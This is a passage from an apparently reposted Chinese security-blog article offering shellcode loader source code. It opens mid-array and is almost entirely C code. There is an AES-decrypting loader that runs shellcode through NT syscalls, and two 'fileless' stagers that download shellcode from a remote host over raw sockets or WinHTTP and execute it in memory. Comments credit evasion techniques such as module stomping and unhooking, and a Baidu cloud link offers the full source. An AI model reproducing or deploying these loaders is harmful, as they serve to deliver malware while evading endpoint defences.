0xc, 0x72, 0x37, 0x94, 0xa6, 0x1b, 0x5c, 0x6d, 0x41 };

   DWORD payload_length = sizeof(AESshellcode);   PVOID BaseAddress = NULL;   SIZE_T dwSize = 0x2000;    NTSTATUS status1 = NtAllocateVirtualMemory(NtCurrentProcess(), &BaseAddress, 0, &dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);    if (!NT_SUCCESS(status1)) {        return 1;    }    // Decrypt the AES payload to Original Shellcode     DecryptAES((char*)AESshellcode, payload_length, AESkey, sizeof(AESkey));    RtlMoveMemory(BaseAddress, AESshellcode, sizeof(AESshellcode));    HANDLE hThread;    DWORD OldProtect = 0; NTSTATUS NtProtectStatus1 = NtProtectVirtualMemory(NtCurrentProcess(), &BaseAddress, (PSIZE_T)&dwSize, PAGE_EXECUTE_READ, &OldProtect);    if (!NT_SUCCESS(NtProtectStatus1)) {        return 2;    }    HANDLE hHostThread = INVALID_HANDLE_VALUE;NTSTATUS NtCreateThreadstatus = NtCreateThreadEx(&hHostThread, 0x1FFFFF, NULL, NtCurrentProcess(), (LPTHREAD_START_ROUTINE)BaseAddress, NULL, FALSE, NULL, NULL, NULL, NULL);    if (!NT_SUCCESS(NtCreateThreadstatus)) {        printf("[!] Failed in sysNtCreateThreadEx (%u)n", GetLastError());        return 3;    }    LARGE_INTEGER Timeout;    Timeout.QuadPart = -10000000;  NTSTATUS NTWFSOstatus = NtWaitForSingleObject(hHostThread, FALSE, &Timeout);    if (!NT_SUCCESS(NTWFSOstatus)) {        printf("[!] Failed in sysNtWaitForSingleObject (%u)n", GetLastError());        return 4;    }    return 0;}

4、FileLess shellcode:
4-1、Using Sockets:

// credits : @SEKTOR7Module stomping, Module Unhooking, No New Thread, Function obfuscation#include <winsock2.h>#include <ws2tcpip.h>#include <Windows.h>#include <stdio.h>#pragma comment(lib, "ntdll")#pragma comment (lib, "Ws2_32.lib")#pragma comment (lib, "Mswsock.lib")#pragma comment (lib, "AdvApi32.lib")#define NtCurrentProcess()   ((HANDLE)-1)#define DEFAULT_BUFLEN 4096#ifndef NT_SUCCESS#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)#endif

EXTERN_C NTSTATUS NtAllocateVirtualMemory(    HANDLE    ProcessHandle,    PVOID* BaseAddress,    ULONG_PTR ZeroBits,    PSIZE_T   RegionSize,    ULONG     AllocationType,    ULONG     Protect);

EXTERN_C NTSTATUS NtProtectVirtualMemory(    IN HANDLE ProcessHandle,    IN OUT PVOID* BaseAddress,    IN OUT PSIZE_T RegionSize,    IN ULONG NewProtect,    OUT PULONG OldProtect);

EXTERN_C NTSTATUS NtCreateThreadEx(    OUT PHANDLE hThread,    IN ACCESS_MASK DesiredAccess,    IN PVOID ObjectAttributes,    IN HANDLE ProcessHandle,    IN PVOID lpStartAddress,    IN PVOID lpParameter,    IN ULONG Flags,    IN SIZE_T StackZeroBits,    IN SIZE_T SizeOfStackCommit,    IN SIZE_T SizeOfStackReserve,    OUT PVOID lpBytesBuffer);EXTERN_C NTSTATUS NtWaitForSingleObject(    IN HANDLE         Handle,    IN BOOLEAN        Alertable,    IN PLARGE_INTEGER Timeout);void RunShellcode(char* shellcode, DWORD shellcodeLen) {    PVOID BaseAddress = NULL;    SIZE_T dwSize = 0x2000;    PCSTR Terminator = NULL;    NTSTATUS STATUS;    NTSTATUS status1 = NtAllocateVirtualMemory(NtCurrentProcess(), &BaseAddress, 0, &dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);    if (!NT_SUCCESS(status1)) {        return ;    }    RtlMoveMemory(BaseAddress, shellcode, shellcodeLen);    HANDLE hThread;    DWORD OldProtect = 0;    NTSTATUS NtProtectStatus1 = NtProtectVirtualMemory(NtCurrentProcess(), &BaseAddress, (PSIZE_T)&dwSize, PAGE_EXECUTE_READ, &OldProtect);    if (!NT_SUCCESS(NtProtectStatus1)) {        return ;    }    HANDLE hHostThread = INVALID_HANDLE_VALUE;    NTSTATUS NtCreateThreadstatus = NtCreateThreadEx(&hHostThread, 0x1FFFFF, NULL, NtCurrentProcess(), (LPTHREAD_START_ROUTINE)BaseAddress, NULL, FALSE, NULL, NULL, NULL, NULL);    if (!NT_SUCCESS(NtCreateThreadstatus)) {        printf("[!] Failed in sysNtCreateThreadEx (%u)n", GetLastError());        return ;    }    LARGE_INTEGER Timeout;    Timeout.QuadPart = -10000000;    NTSTATUS NTWFSOstatus = NtWaitForSingleObject(hHostThread, FALSE, &Timeout);    if (!NT_SUCCESS(NTWFSOstatus)) {        printf("[!] Failed in sysNtWaitForSingleObject (%u)n", GetLastError());        return ;    }}void getShellcode_Run(char* host, char* port, char* resource) {    DWORD oldp = 0;    BOOL returnValue;    size_t origsize = strlen(host) + 1;    const size_t newsize = 100;    size_t convertedChars = 0;    wchar_t Whost[newsize];    mbstowcs_s(&convertedChars, Whost, origsize, host, _TRUNCATE);    WSADATA wsaData;    SOCKET ConnectSocket = INVALID_SOCKET;    struct addrinfo* result = NULL,        * ptr = NULL,        hints;    char sendbuf[MAX_PATH] = "";    lstrcatA(sendbuf, "GET /");    lstrcatA(sendbuf, resource);    char recvbuf[DEFAULT_BUFLEN];    memset(recvbuf, 0, DEFAULT_BUFLEN);    int iResult;    int recvbuflen = DEFAULT_BUFLEN;    // Initialize Winsock    iResult = WSAStartup(MAKEWORD(2, 2), &wsaData);    if (iResult != 0) {        printf("WSAStartup failed with error: %dn", iResult);        return ;    }    ZeroMemory(&hints, sizeof(hints));    hints.ai_family = PF_INET;    hints.ai_socktype = SOCK_STREAM;    hints.ai_protocol = IPPROTO_TCP;    // Resolve the server address and port    iResult = getaddrinfo(host, port, &hints, &result);    if (iResult != 0) {        printf("getaddrinfo failed with error: %dn", iResult);        WSACleanup();        return ;    }    // Attempt to connect to an address until one succeeds    for (ptr = result; ptr != NULL; ptr = ptr->ai_next) {

        // Create a SOCKET for connecting to server        ConnectSocket = socket(ptr->ai_family, ptr->ai_socktype,            ptr->ai_protocol);        if (ConnectSocket == INVALID_SOCKET) {            printf("socket failed with error: %ldn", WSAGetLastError());            WSACleanup();            return ;        }        // Connect to server.        printf("[+] Connect to %s:%s", host, port);        iResult = connect(ConnectSocket, ptr->ai_addr, (int)ptr->ai_addrlen);        if (iResult == SOCKET_ERROR) {            closesocket(ConnectSocket);            ConnectSocket = INVALID_SOCKET;            continue;        }        break;    }    freeaddrinfo(result);    if (ConnectSocket == INVALID_SOCKET) {        printf("Unable to connect to server!n");        WSACleanup();        return ;    }    // Send an initial buffer    iResult = send(ConnectSocket, sendbuf, (int)strlen(sendbuf), 0);    if (iResult == SOCKET_ERROR) {        printf("send failed with error: %dn", WSAGetLastError());        closesocket(ConnectSocket);        WSACleanup();        return ;    }    printf("n[+] Sent %ld Bytesn", iResult);     // shutdown the connection since no more data will be sent    iResult = shutdown(ConnectSocket, SD_SEND);    if (iResult == SOCKET_ERROR) {        printf("shutdown failed with error: %dn", WSAGetLastError());        closesocket(ConnectSocket);        WSACleanup();        return ;    }    // Receive until the peer closes the connection    do {        iResult = recv(ConnectSocket, (char*)recvbuf, recvbuflen, 0);        if (iResult > 0)            printf("[+] Received %d Bytesn", iResult);        else if (iResult == 0)            printf("[+] Connection closedn");        else            printf("recv failed with error: %dn", WSAGetLastError());        RunShellcode(recvbuf, recvbuflen);    } while (iResult > 0);    // cleanup    closesocket(ConnectSocket);    WSACleanup();}int main(int argc, char** argv) {    // Validate the parameters    if (argc != 4) {        printf("[+] Usage: %s <RemoteIP> <RemotePort> <Resource>n", argv[0]);        return 1;    }    getShellcode_Run(argv[1], argv[2], argv[3]);    return 0;}

4-2、Using WinHttp:

#include <Windows.h>#include <stdio.h>#include <wininet.h>#include <winhttp.h>#include <vector>#pragma comment(lib, "ntdll")#pragma comment(lib, "winhttp")#pragma warning (disable: 4996)#define _CRT_SECURE_NO_WARNINGS#define NtCurrentProcess()   ((HANDLE)-1)#define DEFAULT_BUFLEN 4096#ifndef NT_SUCCESS#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)#endifEXTERN_C NTSTATUS NtAllocateVirtualMemory(    HANDLE    ProcessHandle,    PVOID* BaseAddress,    ULONG_PTR ZeroBits,    PSIZE_T   RegionSize,    ULONG     AllocationType,    ULONG     Protect);EXTERN_C NTSTATUS NtProtectVirtualMemory(    IN HANDLE ProcessHandle,    IN OUT PVOID* BaseAddress,    IN OUT PSIZE_T RegionSize,    IN ULONG NewProtect,    OUT PULONG OldProtect);

EXTERN_C NTSTATUS NtCreateThreadEx(    OUT PHANDLE hThread,    IN ACCESS_MASK DesiredAccess,    IN PVOID ObjectAttributes,    IN HANDLE ProcessHandle,    IN PVOID lpStartAddress,    IN PVOID lpParameter,    IN ULONG Flags,    IN SIZE_T StackZeroBits,    IN SIZE_T SizeOfStackCommit,    IN SIZE_T SizeOfStackReserve,    OUT PVOID lpBytesBuffer);EXTERN_C NTSTATUS NtWaitForSingleObject(    IN HANDLE         Handle,    IN BOOLEAN        Alertable,    IN PLARGE_INTEGER Timeout);void RunShellcode(char* shellcode, DWORD shellcodeLen) {    PVOID BaseAddress = NULL;    SIZE_T dwSize2 = 0x2000;    PCSTR Terminator = NULL;    NTSTATUS STATUS;

    NTSTATUS status1 = NtAllocateVirtualMemory(NtCurrentProcess(), &BaseAddress, 0, &dwSize2, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);    if (!NT_SUCCESS(status1)) {        return ;    }    RtlMoveMemory(BaseAddress, shellcode, shellcodeLen);    HANDLE hThread;    DWORD OldProtect = 0;    NTSTATUS NtProtectStatus1 = NtProtectVirtualMemory(NtCurrentProcess(), &BaseAddress, &dwSize2, PAGE_EXECUTE_READ, &OldProtect);    if (!NT_SUCCESS(NtProtectStatus1)) {        return;    }    printf("nnShellcode_mem  :  %pnn", BaseAddress);    getchar();    HANDLE hHostThread = INVALID_HANDLE_VALUE;    NTSTATUS NtCreateThreadstatus = NtCreateThreadEx(&hHostThread, 0x1FFFFF, NULL, NtCurrentProcess(), (LPTHREAD_START_ROUTINE)BaseAddress, NULL, FALSE, NULL, NULL, NULL, NULL);    if (!NT_SUCCESS(NtCreateThreadstatus)) {        printf("[!] Failed in sysNtCreateThreadEx (%u)n", GetLastError());        return;    }    LARGE_INTEGER Timeout;    Timeout.QuadPart = -10000000; NTSTATUS NTWFSOstatus = NtWaitForSingleObject(hHostThread, FALSE, &Timeout);    if (!NT_SUCCESS(NTWFSOstatus)) {   printf("[!] Failed in sysNtWaitForSingleObject (%u)n", GetLastError());        return;    }}void getShellcode_Run(wchar_t* whost, DWORD port, wchar_t* wresource) {    DWORD dwSize = 0;    DWORD dwDownloaded = 0;    LPSTR pszOutBuffer = NULL;    BOOL  bResults = FALSE;    HINTERNET  hSession = NULL,        hConnect = NULL,        hRequest = NULL;    // Use WinHttpOpen to obtain a session handle.    hSession = WinHttpOpen(L"WinHTTP Example/1.0",        WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,        WINHTTP_NO_PROXY_NAME,  WINHTTP_NO_PROXY_BYPASS, 0);    // Specify an HTTP server.    if (hSession)        hConnect = WinHttpConnect(hSession, whost, port, 0);    else        printf("Failed in WinHttpConnect (%u)n", GetLastError());    // Create an HTTP request handle.    if (hConnect)        hRequest = WinHttpOpenRequest(hConnect, L"GET", wresource,      NULL, WINHTTP_NO_REFERER, WINHTTP_DEFAULT_ACCEPT_TYPES, NULL);    else        printf("Failed in WinHttpOpenRequest (%u)n", GetLastError());    // Send a request.    if (hRequest)        bResults = WinHttpSendRequest(hRequest,            WINHTTP_NO_ADDITIONAL_HEADERS,            0, WINHTTP_NO_REQUEST_DATA, 0,  0, 0);    else        printf("Failed in WinHttpSendRequest (%u)n", GetLastError());    // End the request.    if (bResults)        bResults = WinHttpReceiveResponse(hRequest, NULL); else printf("Failed in WinHttpReceiveResponse (%u)n", GetLastError());    // Keep checking for data until there is nothing left.    if (bResults)        do        {            // Check for available data.            dwSize = 0;            if (!WinHttpQueryDataAvailable(hRequest, &dwSize))                printf("Error %u in WinHttpQueryDataAvailable (%u)n", GetLastError());            // Allocate space for the buffer.            pszOutBuffer = new char[dwSize + 1];            if (!pszOutBuffer)            {                printf("Out of memoryn");                dwSize = 0;            }            else            {                // Read the Data.                ZeroMemory(pszOutBuffer, dwSize + 1);                if (!WinHttpReadData(hRequest, (LPVOID)pszOutBuffer,                    dwSize, &dwDownloaded))                    printf("Error %u in WinHttpReadData.n", GetLastError());                else {                     // Run the shellcode                    RunShellcode(pszOutBuffer, dwSize + 1);                }            }        } while (dwSize > 0);        // Report any errors.        if (!bResults)            printf("Error %d has occurred.n", GetLastError());

        // Close any open handles.        if (hRequest) WinHttpCloseHandle(hRequest);        if (hConnect) WinHttpCloseHandle(hConnect);        if (hSession) WinHttpCloseHandle(hSession);}int main(int argc, char** argv) {    // Validate the parameters    if (argc != 4) {        printf("[+] Usage: %s <RemoteIP> <RemotePort> <Resource>n", argv[0]);        return 1;    }    char* host = argv[1];    DWORD port = atoi(argv[2]);    char* resource = argv[3];    const size_t cSize1 = strlen(host) + 1;    wchar_t* whost = new wchar_t[cSize1];    mbstowcs(whost, host, cSize1);    const size_t cSize2 = strlen(resource) + 1;    wchar_t* wresource = new wchar_t[cSize2];    mbstowcs(wresource, resource, cSize2);    getShellcode_Run(whost, port, wresource);        return 0;}

下址地址:

链接:https://pan.baidu.com/s/1aQkt93RPdFVR3wj0V13d4w 提取码:9g8j 

题外话:用 VS2022-V17.5编译,果然如网上介绍的那样,超快,满意!

文章来源:MicroPest

原文始发于微信公众号(渗透Xiao白帽):一组shellcode加密方式(附源码)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年3月1日11:42:06
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   一组shellcode加密方式(附源码)https://cn-sec.com/archives/1581055.html

发表评论

匿名网友 填写信息